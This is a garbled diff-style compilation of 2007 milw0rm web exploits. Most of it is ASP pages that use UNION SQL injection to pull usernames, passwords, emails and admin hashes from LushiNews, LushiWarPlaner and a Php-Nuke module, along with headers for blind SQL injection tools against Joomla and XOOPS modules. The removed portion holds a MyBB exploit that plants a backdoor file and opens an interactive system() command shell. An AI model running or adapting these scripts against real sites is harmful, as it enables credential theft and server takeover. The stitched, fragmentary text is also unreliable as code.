+ 
    
+
     
+
+  
    
+
+
+<%
+hedef = targettext
+Dim objem
+Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
+objem.Open "GET" , hedef , false
+
+objem.sEnd
+
+strHTML = objem.ResponseText
+
+header=objem.getallResponseheaders()
+Response.Write "
    "
+Response.Write ""
+Response.Write "
    Header Bilgileri
    "
+Response.Write "    "
+Response.Write "
    " & header & "
    "
+Response.Write "
    Whois
    "
+Response.Write "
    Site:[google.com]
    "
+Response.Write "
    "
+Set objem=Nothing
+
+%>
+
+
    
+  
    
+  
+  
    
+
    
+
+     
+
    
+
+
+
        
+     
+
     
+
+
+
+
+    
+
+
+
+
+<%
+End If
+End If
+End If
+End If
+End If
+
+%>
+
+
+<%
+If islem = "whois" Then
+site = Request.Form("whoissite")
+target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain"
+
+Public Function take(come)
+Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
+With objtake
+  .Open "GET" , come, FALSE
+  .sEnd
+take =  .Responsetext
+End With
+Set objtake = Nothing
+End Function
+
+remoteadres=take(target1)
+
+dim baslangic , bitis
+baslangic = "
    "
+bitis = "
    "
+dim x , abc
+x = 0
+abc = 0
+dim sonuc
+sonuc = ""
+
+Do Until abc = 2
+x = x + 1
+If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then
+abc = abc + 1
+End If
+If Mid(remoteadres,x,Len(baslangic)) = baslangic Then
+abc = abc + 1
+Else
+If abc = 1 Then
+sonuc = sonuc + Mid(remoteadres,x,1)
+End If
+End If
+Loop
+
+Set objtake=Nothing
+ 
+%>
+
+
    
+Whois Bilgileri
    
+
-
    
-
    
-
-
    
-  
    
-  
-  
    
-
    
-
-
-
-<%
-End If
-%>
-
-<%
-Response.Write "
    "
-Response.Write "
    "
-Response.Write "
    "
-Response.Write ""
-Response.Write "En iyi "
-Response.Write ""
-Response.Write ""
-Response.Write "1152x864 "
-Response.Write ""
-Response.Write "çözünürlük ve "
-Response.Write "Firefox "
-Response.Write "ile görüntülünebilir.
    "
-
-Response.Write "
    "
-Response.Write ""
-Response.Write "Exploit coded by "
-Response.Write ""
-Response.Write ""
-Response.Write "ajann"
-Response.Write ""
-Response.Write "
    "
-
-%>
-
-# milw0rm.com [2007-02-08]
+<% Response.Buffer = True %>
+<% On Error Resume Next %>
+<% Server.ScriptTimeout = 100 %>
+
+<%
+'===============================================================================================
+'[Script Name: LushiNews <= 1.01 (comments.php) Remote SQL Injection Exploit
+'[Coded by   : ajann
+'[Author     : ajann
+'[Contact    : :(
+'[S.Page     : http://www.lushi.de
+'[ExploitName: exploit2.asp
+
+'[Note  : exploit file name =>exploit2.asp
+'[Update: + Get Header
+'[Update: + Get Whois Info
+'===============================================================================================
+
+%>
+
+<%
+
+title="LushiNews <= 1.01 (comments.php) Remote SQL Injection Exploit" 'Vuln Title
+
+%>
+
+<% = title %>
+
+
+
+
+
+
+
+
+
+
    
+<% = title %>
+

    
+
+  
+    
+    
+  
+
+
    
+    TARGET:Example:[http://x.com/path]
    
+    USER ID:Example:[User 
+    ID=1]
    
+      		
+ 
    
+
    
+
    
+
    
+
+
    
+
+<%
+islem = Request.QueryString("islem")    
+
+If islem = "hata1" Then 
+Response.Write "There is a problem! Please complete to the whole spaces"
+End If
+
+If islem = "hata2" Then 
+Response.Write "There is a problem! Please right character use"
+End If
+
+If islem = "hata3" Then 
+Response.Write "There is a problem! Add ""http://"""
+End If
+
+If islem = "hata4" Then 
+Response.Write "There is a problem! Just Numeric Character!"
+End If
+
+%>
+
+<%  
+
+If islem = "get" Then
+
+id= Request.Form("id")
+
+file="comments.php?id="
+sql="-1%20union%20select%20concat(char"
+sql1="(85,115,101,114,110,97,109,101,58),char(32),"
+sql2="Name,char(32),char(80,97,115,115,119,111,114,"
+sql3="100,58),Passwort),0,0,0,concat(c"
+sql4="har(109,109,97,105,108,58),mail)%20from%20"
+sql5="members%20where%20ID="
+sql6=id
+
+
+idform = Request.Form("id")
+targettext = Request.Form("text1")
+arama=InStr(1, targettext, "union" ,1)
+arama2=InStr(1, targettext, "http://" ,1)
+
+If targettext="" Then
+Response.Redirect("exploit2.asp?islem=hata1")
+
+Else
+If arama>0 then 
+Response.Redirect("exploit2.asp?islem=hata2")
+
+Else
+If arama2=0 then 
+Response.Redirect("exploit2.asp?islem=hata3")
+
+Else
+IF Not IsNumeric(idform) Then
+Response.Redirect("exploit2.asp?islem=hata4")
+
+Else
+%> 
+
+<%
+
+target1 = targettext+file+sql+sql1+sql2+sql3+sql4+sql5+sql6
+
+Public Function take(come)
+Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
+With objtake
+  .Open "GET" , come, FALSE
+  .sEnd
+  
+take =  .Responsetext
+End With
+SET objtake = Nothing
+End Function
+
+
+get_username = take(target1)
+
+getdata=InStr(get_username,"0  0/" )
+username=Mid(get_username,getdata+5,90)
+
+Dim metin
+metin = take(target1)  
+
+Dim objReg
+Set objReg = New RegExp
+objReg.Global = False
+objReg.IgnoreCase = True
+
+objReg.Pattern = "Username: [A-Za-z0-9ý]+ Pass"
+Dim calistir, istediginString
+Set calistir = objReg.Execute(metin)
+
+
+If calistir.Count = 0 Then
+     Response.write "Not True"
+Else
+      basusername = Replace(calistir.Item(0), "Username: " , "" )
+      basusername = Replace(basusername, " Pass" , "" )
+
+
+
+      objReg.Pattern = "Password:[A-Za-z0-9ý]+    "
+      Set calistir = objReg.Execute(metin)
+      baspassword = Replace(calistir.Item(0), "Password:" , "" )
+      baspassword = Replace(baspassword, "" , "" )
+
+     
+      objReg.Pattern = "mmail:[A-Za-z0-9@.]+"
+      Set calistir = objReg.Execute(metin)
+      basemail = Replace(calistir.Item(0), "mmail:" , "" )
+      basemail = Replace(basemail, "" , "" )
+
+End If  
+
+
+ 
+Set bulunanlar = Nothing
+Set objReg = Nothing
+
+%>
+
+
    
+ 
+ajann

    
+
+
+  
+    
+    
+  
+
+  
+    
+    
+  
+
+ 
+    
+    
+  
+
+
           
+     
+    Username:<%=basusername%>
    
+ 
           
+     
+    Password:<%=baspassword%>
    
+ 
           
+     
+    Email:<%=basemail%>
    
+ 
    
+
     
+
+  
    
+
+
+<%
+hedef = targettext
+Dim objem
+Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
+objem.Open "GET" , hedef , false
+
+objem.sEnd
+
+strHTML = objem.ResponseText
+
+header=objem.getallResponseheaders()
+Response.Write "
    "
+Response.Write ""
+Response.Write "
    Header Bilgileri
    "
+Response.Write "    "
+Response.Write "
    " & header & "
    "
+Response.Write "
    Whois
    "
+Response.Write "
    Site:[google.com]
    "
+Response.Write "
    "
+Set objem=Nothing
+
+%>
+
+
    
+  
    
+  
+  
    
+
    
+
+     
+
    
+
+
+
        
+     
+
     
+
+
+
+
+
+
+
+
+
+<%
+End If
+End If
+End If
+End If
+End If
+
+%>
+
+
+<%
+If islem = "whois" Then
+site = Request.Form("whoissite")
+target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain"
+
+Public Function take(come)
+Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
+With objtake
+  .Open "GET" , come, FALSE
+  .sEnd
+take =  .Responsetext
+End With
+Set objtake = Nothing
+End Function
+
+remoteadres=take(target1)
+
+dim baslangic , bitis
+baslangic = "
    "
+bitis = "
    "
+dim x , abc
+x = 0
+abc = 0
+dim sonuc
+sonuc = ""
+
+Do Until abc = 2
+x = x + 1
+If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then
+abc = abc + 1
+End If
+If Mid(remoteadres,x,Len(baslangic)) = baslangic Then
+abc = abc + 1
+Else
+If abc = 1 Then
+sonuc = sonuc + Mid(remoteadres,x,1)
+End If
+End If
+Loop
+
+Set objtake=Nothing
+ 
+%>
+
+
    
+Whois Bilgileri
    
+
-
    
-
    
-
-
    
-  
    
-  
-  
    
-
    
-
-
-
-<%
-End If
-%>
-
-<%
-Response.Write "
    "
-Response.Write "
    "
-Response.Write "
    "
-Response.Write ""
-Response.Write "En iyi "
-Response.Write ""
-Response.Write ""
-Response.Write "1152x864 "
-Response.Write ""
-Response.Write "çözünürlük ve "
-Response.Write "Firefox "
-Response.Write "ile görüntülünebilir.
    "
-
-Response.Write "
    "
-Response.Write ""
-Response.Write "Exploit coded by "
-Response.Write ""
-Response.Write ""
-Response.Write "ajann"
-Response.Write ""
-Response.Write "
    "
-
-%>
-
-# milw0rm.com [2007-02-08]
+<% Response.Buffer = True %>
+<% On Error Resume Next %>
+<% Server.ScriptTimeout = 100 %>
+
+<%
+'===============================================================================================
+'[Script Name: LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit
+'[Coded by   : ajann
+'[Author     : ajann
+'[Contact    : :(
+'[S.Page     : http://www.lushi.de
+'[ExploitName: exploit2.asp
+
+'[Note  : exploit file name =>exploit2.asp
+'[Update: + Get Header
+'[Update: + Get Whois Info
+'===============================================================================================
+
+%>
+
+<%
+
+title="LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit" 'Vuln Title
+
+%>
+
+<% = title %>
+
+
+
+
+
+
+
+
+
+
    
+<% = title %>
+

    
+
+  
+    
+    
+  
+
+
    
+    TARGET:Example:[http://x.com/path]
    
+    USER ID:Example:[User 
+    ID=1]
    
+      		
+ 
    
+
    
+
    
+
    
+
+
    
+
+<%
+islem = Request.QueryString("islem")    
+
+If islem = "hata1" Then 
+Response.Write "There is a problem! Please complete to the whole spaces"
+End If
+
+If islem = "hata2" Then 
+Response.Write "There is a problem! Please right character use"
+End If
+
+If islem = "hata3" Then 
+Response.Write "There is a problem! Add ""http://"""
+End If
+
+If islem = "hata4" Then 
+Response.Write "There is a problem! Just Numeric Character!"
+End If
+
+%>
+
+<%  
+
+If islem = "get" Then
+
+id= Request.Form("id")
+
+file="register.php?id="
+sql="-1%20union%20select%200,mail,2,3,4,5,6,"
+sql1="concat(char(85,115,101,114,110,97,"
+sql2="109,101,58),char(32),Name,c"
+sql3="har(32),char(80,97,115,115,119,11"
+sql4="1,114,100,58),Passwort),8,9%20fr"
+sql5="om%20members%20where%20id="
+sql6=id
+
+
+idform = Request.Form("id")
+targettext = Request.Form("text1")
+arama=InStr(1, targettext, "union" ,1)
+arama2=InStr(1, targettext, "http://" ,1)
+
+If targettext="" Then
+Response.Redirect("exploit2.asp?islem=hata1")
+
+Else
+If arama>0 then 
+Response.Redirect("exploit2.asp?islem=hata2")
+
+Else
+If arama2=0 then 
+Response.Redirect("exploit2.asp?islem=hata3")
+
+Else
+IF Not IsNumeric(idform) Then
+Response.Redirect("exploit2.asp?islem=hata4")
+
+Else
+%> 
+
+<%
+
+target1 = targettext+file+sql+sql1+sql2+sql3+sql4+sql5+sql6
+
+Public Function take(come)
+Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
+With objtake
+  .Open "GET" , come, FALSE
+  .sEnd
+  
+take =  .Responsetext
+End With
+SET objtake = Nothing
+End Function
+
+
+get_username = take(target1)
+
+getdata=InStr(get_username,"0  0/" )
+username=Mid(get_username,getdata+5,90)
+
+Dim metin
+metin = take(target1)  
+
+Dim objReg
+Set objReg = New RegExp
+objReg.Global = False
+objReg.IgnoreCase = True
+
+objReg.Pattern = "Username: [A-Za-z0-9ý]+ Pass"
+Dim calistir, istediginString
+Set calistir = objReg.Execute(metin)
+
+
+If calistir.Count = 0 Then
+     Response.write "Not True"
+Else
+      basusername = Replace(calistir.Item(0), "Username: " , "" )
+      basusername = Replace(basusername, " Pass" , "" )
+
+
+
+      objReg.Pattern = "Password:[A-Za-z0-9ý]+"
+      Set calistir = objReg.Execute(metin)
+      baspassword = Replace(calistir.Item(0), "Password:" , "" )
+      baspassword = Replace(baspassword, "" , "" )
+
+     
+      objReg.Pattern = "target=""_blank"" title=""0"">[A-Za-z0-9@.]+"
+      Set calistir = objReg.Execute(metin)
+      basemail = Replace(calistir.Item(0), "target=""_blank"" title=""0"">" , "" )
+      basemail = Replace(basemail, "" , "" )
+
+End If  
+
+
+ 
+Set bulunanlar = Nothing
+Set objReg = Nothing
+
+%>
+
+
    
+ 
+ajann

    
+
+
+  
+    
+    
+  
+
+  
+    
+    
+  
+
+ 
+    
+    
+  
+
+
           
+     
+    Username:<%=basusername%>
    
+ 
           
+     
+    Password:<%=baspassword%>
    
+ 
           
+     
+    Email:<%=basemail%>
    
+ 
    
+
     
+
+  
    
+
+
+<%
+hedef = targettext
+Dim objem
+Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
+objem.Open "GET" , hedef , false
+
+objem.sEnd
+
+strHTML = objem.ResponseText
+
+header=objem.getallResponseheaders()
+Response.Write "
    "
+Response.Write ""
+Response.Write "
    Header Bilgileri
    "
+Response.Write "    "
+Response.Write "
    " & header & "
    "
+Response.Write "
    Whois
    "
+Response.Write "
    Site:[google.com]
    "
+Response.Write "
    "
+Set objem=Nothing
+
+%>
+
+
    
+  
    
+  
+  
    
+
    
+
+     
+
    
+
+
+
        
+     
+
     
+
+
+
+
+
+
+
+
+
+<%
+End If
+End If
+End If
+End If
+End If
+
+%>
+
+
+<%
+If islem = "whois" Then
+site = Request.Form("whoissite")
+target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain"
+
+Public Function take(come)
+Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
+With objtake
+  .Open "GET" , come, FALSE
+  .sEnd
+take =  .Responsetext
+End With
+Set objtake = Nothing
+End Function
+
+remoteadres=take(target1)
+
+dim baslangic , bitis
+baslangic = "
    "
+bitis = "
    "
+dim x , abc
+x = 0
+abc = 0
+dim sonuc
+sonuc = ""
+
+Do Until abc = 2
+x = x + 1
+If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then
+abc = abc + 1
+End If
+If Mid(remoteadres,x,Len(baslangic)) = baslangic Then
+abc = abc + 1
+Else
+If abc = 1 Then
+sonuc = sonuc + Mid(remoteadres,x,1)
+End If
+End If
+Loop
+
+Set objtake=Nothing
+ 
+%>
+
+
    
+Whois Bilgileri
    
+
-
    
-
    
-
-
    
-  
    
-  
-  
    
-
    
-
-
-
-<%
-End If
-%>
-
-<%
-Response.Write "
    "
-Response.Write "
    "
-Response.Write "
    "
-Response.Write ""
-Response.Write "En iyi "
-Response.Write ""
-Response.Write ""
-Response.Write "1152x864 "
-Response.Write ""
-Response.Write "çözünürlük ve "
-Response.Write "Firefox "
-Response.Write "ile görüntülünebilir.
    "
-
-Response.Write "
    "
-Response.Write ""
-Response.Write "Exploit coded by "
-Response.Write ""
-Response.Write ""
-Response.Write "ajann"
-Response.Write ""
-Response.Write "
    "
-
-%>
-
-# milw0rm.com [2007-02-19]
+<% Response.Buffer = True %>
+<% On Error Resume Next %>
+<% Server.ScriptTimeout = 100 %>
+
+<%
+'===============================================================================================
+'[Script Name: Php-Nuke Module Emporium <= 2.3.0 Remote Blind SQL Injection Exploit
+'[Coded by   : ajann
+'[Author     : ajann
+'[Contact    : :(
+'[S.Page     : http://www.burnwave.com/
+'[ExploitName: exploit2.asp
+
+'[Note  : exploit file name =>exploit2.asp
+'[Update: + Get Header
+'[Update: + Get Whois Info
+'===============================================================================================
+
+%>
+
+<%
+
+title="Php-Nuke Module Emporium <= 2.3.0 Remote Blind SQL Injection Exploit" 'Vuln Title
+
+%>
+
+<% = title %>
+
+
+
+
+
+
+
+
+
+
    
+<% = title %>
+

    
+
+  
+    
+    
+  
+
+
    
+    TARGET:Example:[http://x.com/path]
    
+    USER ID:Example:[User 
+    ID=1]
    
+      		
+ 
    
+
    
+
    
+
    
+
+
    
+
+<%
+islem = Request.QueryString("islem")    
+
+If islem = "hata1" Then 
+Response.Write "There is a problem! Please complete to the whole spaces"
+End If
+
+If islem = "hata2" Then 
+Response.Write "There is a problem! Please right character use"
+End If
+
+If islem = "hata3" Then 
+Response.Write "There is a problem! Add ""http://"""
+End If
+
+If islem = "hata4" Then 
+Response.Write "There is a problem! Just Numeric Character!"
+End If
+
+%>
+
+<%  
+
+If islem = "get" Then
+
+id= Request.Form("id")
+
+file="modules.php?name=Shopping_Cart&file=category&category_id="
+sql="1/1%20union%20select%200,pwd,0%20from%20nuke_authors%20where%20radminsuper=1/*"
+
+
+idform = Request.Form("id")
+targettext = Request.Form("text1")
+arama=InStr(1, targettext, "union" ,1)
+arama2=InStr(1, targettext, "http://" ,1)
+
+If targettext="" Then
+Response.Redirect("exploit2.asp?islem=hata1")
+
+Else
+If arama>0 then 
+Response.Redirect("exploit2.asp?islem=hata2")
+
+Else
+If arama2=0 then 
+Response.Redirect("exploit2.asp?islem=hata3")
+
+Else
+IF Not IsNumeric(idform) Then
+Response.Redirect("exploit2.asp?islem=hata4")
+
+Else
+%> 
+
+<%
+
+target1 = targettext+file+sql
+
+Public Function take(come)
+Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
+With objtake
+  .Open "GET" , come, FALSE
+  .sEnd
+  
+take =  .Responsetext
+End With
+SET objtake = Nothing
+End Function
+
+
+get_username = take(target1)
+
+getdata=InStr(get_username,"0  0/" )
+username=Mid(get_username,getdata+5,90)
+
+Dim metin
+metin = take(target1)  
+
+Dim objReg
+Set objReg = New RegExp
+objReg.Global = True
+objReg.IgnoreCase = True
+
+objReg.Pattern = "0"">[A-Za-z0-9ý]+"
+Dim calistir, istediginString
+Set calistir = objReg.Execute(metin)
+
+
+If calistir.Count = 0 Then
+     Response.write "Not True"
+Else
+      basusername = Replace(calistir.Item(0), "0"">" , "" )
+      basusername = Replace(basusername, "" , "" )
+
+
+End If  
+
+
+ 
+Set bulunanlar = Nothing
+Set objReg = Nothing
+
+%>
+
+
    
+ 
+ajann

    
+
+
+  
+    
+    
+  
+
+
+
           
+     
+    Password Admin:<%=basusername%>
    
+ 
    
+
     
+
+  
    
+
+
+<%
+hedef = targettext
+Dim objem
+Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
+objem.Open "GET" , hedef , false
+
+objem.sEnd
+
+strHTML = objem.ResponseText
+
+header=objem.getallResponseheaders()
+Response.Write "
    "
+Response.Write ""
+Response.Write "
    Header Bilgileri
    "
+Response.Write "    "
+Response.Write "
    " & header & "
    "
+Response.Write "
    Whois
    "
+Response.Write "
    Site:[google.com]
    "
+Response.Write "
    "
+Set objem=Nothing
+
+%>
+
+
    
+  
    
+  
+  
    
+
    
+
+     
+
    
+
+
+
        
+     
+
     
+
+
+
+
+
+
+
+
+
+<%
+End If
+End If
+End If
+End If
+End If
+
+%>
+
+
+<%
+If islem = "whois" Then
+site = Request.Form("whoissite")
+target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain"
+
+Public Function take(come)
+Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
+With objtake
+  .Open "GET" , come, FALSE
+  .sEnd
+take =  .Responsetext
+End With
+Set objtake = Nothing
+End Function
+
+remoteadres=take(target1)
+
+dim baslangic , bitis
+baslangic = "
    "
+bitis = "
    "
+dim x , abc
+x = 0
+abc = 0
+dim sonuc
+sonuc = ""
+
+Do Until abc = 2
+x = x + 1
+If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then
+abc = abc + 1
+End If
+If Mid(remoteadres,x,Len(baslangic)) = baslangic Then
+abc = abc + 1
+Else
+If abc = 1 Then
+sonuc = sonuc + Mid(remoteadres,x,1)
+End If
+End If
+Loop
+
+Set objtake=Nothing
+ 
+%>
+
+
    
+Whois Bilgileri
    
+
-	        
-	        
-       	    
-				
-			
-			
    
-			
-
-# milw0rm.com [2007-03-14]
+
+
+--======Dj7xpl======--
+ 
+
    
+
    
+            
+	        

    
+			your script:
    
+             
    
-
    
-
-ajann
    
-
    
-
    
-
-
- 
- 
-
-# milw0rm.com [2007-03-27]
+
+
+Joomla Component D4JeZine <= 2.8 Remote BLIND SQL Injection Exploit
+
+
+
+   
+
+ 
+
+
    
+
+
    Joomla Component D4JeZine <= 2.8 Remote BLIND SQL Injection Exploit
    
+
+
    
+    Target:[http://[target]/
+               
+  
    
+
    
+     Path:[http://[target]/[scriptpath]    
+  
+  
    
+     Character:[Md5 
+  Character 1-32]   
+  
+
    
+  
    
+     Article ID[Article 
+    ID Numeric]        
+  
+
    
+  
    
+
    
+ 
    
-
    
-
-ajann
    
-
    
-
    
-
-
- 
- 
-
-# milw0rm.com [2007-03-31]
+
+
+XOOPS Module Lykos Reviews 1.00 (index.php) BLIND SQL Injection Exploit
+
+
+
+   
+
+ 
+
+
    
+
+
    XOOPS Module Lykos Reviews 1.00 (index.php) BLIND SQL Injection Exploit
    
+
+
    
+    Target:[http://[target]/
+               
+  
    
+
    
+     Path:[http://[target]/[scriptpath]    
+  
+  
    
+     Character:[Md5 
+  Character 1-32]   
+  
+
    
+  
    
+
    
+ 
    
-
    
-
-ajann
    
-
    
-
    
-
-
- 
- 
-
-# milw0rm.com [2007-04-01]
+
+
+XOOPS Module debaser <= 0.92(genre.php) BLIND SQL Injection Exploit
+
+
+
+   
+
+ 
+
+
    
+
+
    XOOPS Module debaser <= 0.92(genre.php) BLIND SQL Injection Exploit
    
+
+
    
+    Target:[http://[target]/
+               
+  
    
+
    
+     Path:[http://[target]/[scriptpath]    
+  
+  
    
+     Character:[Md5 
+  Character 1-32]   
+  
+
    
+  
    
+    Genre Id:[genre.php?genreid=]   
+  
+
    
+  
    
+
    
+ 
    
-
    
-
-ajann
    
-
    
-
    
-
-
- 
- 
-
-# milw0rm.com [2007-04-02]
+
+
+XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit
+
+
+
+   
+
+ 
+
+
    
+
+
    XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit
    
+
+
    
+    Target:[http://[target]/
+               
+  
    
+
    
+     Path:[http://[target]/[scriptpath]    
+  
+  
    
+     Character:[Md5 
+  Character 1-32]   
+  
+
    
+  
    
+    Article Id:[print.php?articleid=]   
+  
+
    
+  
    
+
    
+#',$xpl->getcontent(),$name_value);
-
-# We can't use:
-# - 
-# - ' OR "
-#
-$PHPCODE = '${${error_reporting(0)}}'
-          .'${${$handle=fopen('.chrit('./'.$backdoor).','.chrit('w').')}}'
-          .'${${fwrite($handle,'.chrit('').')}}'
-          .'${${fclose($handle)}}';
-$name_value[2][0] .= $PHPCODE;
-
-$postdata=array(frmdt_url => $url.'admin/languages.php',
-               "adminsid" => $sid, "action" => "do_edit",
-               "lang" => $lang, "editwith" => 0,
-               "inadmin"=> 0, "file"=> $filetoed,
-               "Update Language Variables"=>"  Update Language Variables");
-
-for($i=0;$ishowlastrequest();
-$xpl->formdata($postdata);
-
-# Trying to execute the php code
-$xpl->get($url.'index.php');
-
-# If not the default language
-$xpl->get($url.'inc/languages/'.$lang.'/'.$filetoed);
-print "\nThe php file should be created\n\$shell> ";
-
-# Hello master
-while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
-{
-    # ');include('../../inc/config.php');print $config['password'];//
-    $xpl->addheader('Shell',"system('$cmd');");
-    $xpl->get($url.$backdoor);
-    print $xpl->getcontent()."\n\$shell> ";
-}
-
-function sql_inject($field)
-{
-	global $xpl,$url,$prefix,$debug,$result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
-	$sub=0;$string='';
-	
-	if($field=='ip') {$a='44';$b='57';} # . 0-9
-	else {$a='46';$b='70';}             # 0-9 A-Z
-	
-	while(TRUE)
-	{
-		$sub++;
-		for($i=$a;$i<=$b;$i++)
-		{
-			# Random ip
-			$fakeip = rand(128,254).'.'
-			         .rand(128,254).'.'
-			         .rand(128,254).'.'
-			         .rand(128,254);
-
-			# Calculation of the server response time which returns TRUE
-			if($i==$a) $f='TST';
-			
-			# End of the string ?
-			elseif($i==($a+1)) $f='NULL';
-			
-			# Test the char
-			else $f=$i;
-			
-			# Table prefix
-			if($sub==1 AND $i==$a)
-			{
-				$xpl->addheader('Client-IP',$fakeip."'");
-				$xpl->get($url.'index.php');
-
-				if(preg_match("#DELETE FROM (\S*)sessions#i",$xpl->getcontent(),$match)) $prefix=$match[1];
-				else $prefix='mybb_';
-			}
-
-			# +-class_session.php (#2)
-			# |
-			# 475.	function create_session($uid=0)
-			# 476.	{
-			# 477.		global $db;
-			# 478.		$speciallocs = $this->get_special_locations();
-			# 479.
-			# 480.		// If there is a proper uid, delete by uid.
-			# 481.		if($uid > 0)
-			# 482.		{
-			# 483.			$db->delete_query(TABLE_PREFIX."sessions", "uid=".$uid);
-			# 484.			$onlinedata['uid'] = $uid;
-			# 485.		}
-			# 486.		// Else delete by ip.
-			# 487.		else
-			# 488.		{   // $this->ipaddress = get_ip();
-			# 489.			$db->delete_query(TABLE_PREFIX."sessions", "ip='".$this->ipaddress."'");
-			# 490.			$onlinedata['uid'] = 0;
-			# 491.		}
-			#
-			$sql  = $fakeip."' OR ip=(SELECT IF(SUBSTR(";
-			$sql .= ($f=='TST') ? "(SELECT 1)" : "(SELECT $field FROM ${prefix}adminsessions ORDER BY lastactive DESC LIMIT 1)";
-			$sql .= ($f=='TST') ? ",1" : ",$sub";
-			$sql .= ($f=='TST') ? ",1)=CHAR(49)" : ",1)=CHAR($f)";
-			$sql .= ",BENCHMARK($benchmark,CHAR(66)),1)) #";
-
-
-			# +-functions.php (#1)
-			# |
-			# 1836. function get_ip()
-			# 1837. {
-			# 1838.	if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
-			# 1839.	{
-			# 1840.		if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
-			# 1841.		{
-			# 1842.			foreach($addresses[0] as $key => $val)
-			# 1843.			{
-			# 1844.				if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
-			# 1845.				{
-			# 1846.					$ip = $val;
-			# 1847.					break;
-			# 1848.				}
-			# 1849.			}
-			# 1850.		}
-			# 1851.	}
-			# 1852.	if(!isset($ip))
-			# 1853.	{
-			# 1854.		if(isset($_SERVER['HTTP_CLIENT_IP']))
-			# 1855.		{
-			# 1856.			$ip = $_SERVER['HTTP_CLIENT_IP'];
-			# 1857.		}
-			# 1858.		else
-			# 1859.		{
-			# 1860.			$ip = $_SERVER['REMOTE_ADDR'];
-			# 1861.		}
-			# 1862.	}
-			# 1863.	return $ip;
-			# 1864. }
-			#
-			$bef = time();
-			$xpl->reset('header');
-			$xpl->addheader('Client-IP',$sql);
-			$xpl->get($url.'index.php');
-			$aft = time();
-			
-			if($f=='TST') $truetime=$aft-$bef;
-			if(getparam('truetime')!='') $truetime=getparam('truetime');
-			
-			# Server response time >= Server response time which returns TRUE ?
-			$restime = $aft-$bef;
-			if($restime >= $truetime AND $f != 'TST') $result='TRUE';
-			else $result='FALSE';
-
-			# Debug mode activated
-			if($debug) debug('',$field);
-			
-			# The tested char returns TRUE
-			if($result=='TRUE')
-			{
-				if($f!='NULL')
-				{
-					# Continue
-					print strtolower(chr($f));
-					$string .= chr($f);
-					break;
-				}
-				else
-				{
-					# End of the string
-					$xpl->reset('header');
-					return $string;
-				}
-			}
-			
-			# Retry if no char found
-			if($f==$b) $sub--;
-		}
-	}
-}
-
-function debug($init='',$dafield='')
-{
-	global $result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
-	if($init)
-	{
-		$handle = fopen("debug_mybb.html","w+");
-		$data = "
    MyBulletinBoard (MyBB) <= 1.2.3 Code Execution Exploit
    
-		
    
-		
-		
-		
-		
-		";
-		# 
-		$data .= "
-		
-		
-		
-		";
-		fwrite($handle,$data);
-		fclose($handle);
-	}
-	else
-	{
-		$handle = fopen("debug_mybb.html","a");
-		$data   = "
-		
-		
-		
-		
-		";
-		# 
-		$data .= "
-		
-		
-		
-		";
-		fwrite($handle,$data);
-		fclose($handle);
-	}
-}
-
-function chrit($string)
-{
-	$char = '';
-	for($i=0;$i $key)
-	{
-		if($key == '-'.$param) {
-		   if(!empty($argv[$value+1])) return $argv[$value+1];
-		   else return 1;
-		}
-	}
-	if($opt) exit("\n-$param parameter required");
-	else return;
-}
-
-/*
- * 
- * Copyright (C) darkfig
- * 
- * This program is free software; you can redistribute it and/or 
- * modify it under the terms of the GNU General Public License 
- * as published by the Free Software Foundation; either version 2 
- * of the License, or (at your option) any later version. 
- * 
- * This program is distributed in the hope that it will be useful, 
- * but WITHOUT ANY WARRANTY; without even the implied warranty of 
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
- * GNU General Public License for more details. 
- * 
- * You should have received a copy of the GNU General Public License 
- * along with this program; if not, write to the Free Software 
- * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
- * 
- * TITLE:          PhpSploit Class
- * REQUIREMENTS:   PHP 5 (remove "private", "public" if you have PHP 4)
- * VERSION:        1.2
- * LICENSE:        GNU General Public License
- * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
- * FILENAME:       phpsploitclass.php
- *
- * CONTACT:        gmdarkfig@gmail.com (french / english)
- * GREETZ:         Sparah, Ddx39
- *
- * DESCRIPTION:
- * The phpsploit is a class implementing a web user agent.
- * You can add cookies, headers, use a proxy server with (or without) a
- * basic authentification. It supports the GET and the POST method. It can
- * also be used like a browser with the cookiejar() function (which allow
- * a server to add several cookies for the next requests) and the
- * allowredirection() function (which allow the script to follow all
- * redirections sent by the server). It can return the content (or the
- * headers) of the request. Others useful functions can be used for debugging.
- * A manual is actually in development but to know how to use it, you can
- * read the comments.
- *
- * CHANGELOG:
- * [2007-01-24] (1.2)
- *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
- *  * New: multipart/form-data enctype is now supported 
- *
- * [2006-12-31] (1.1)
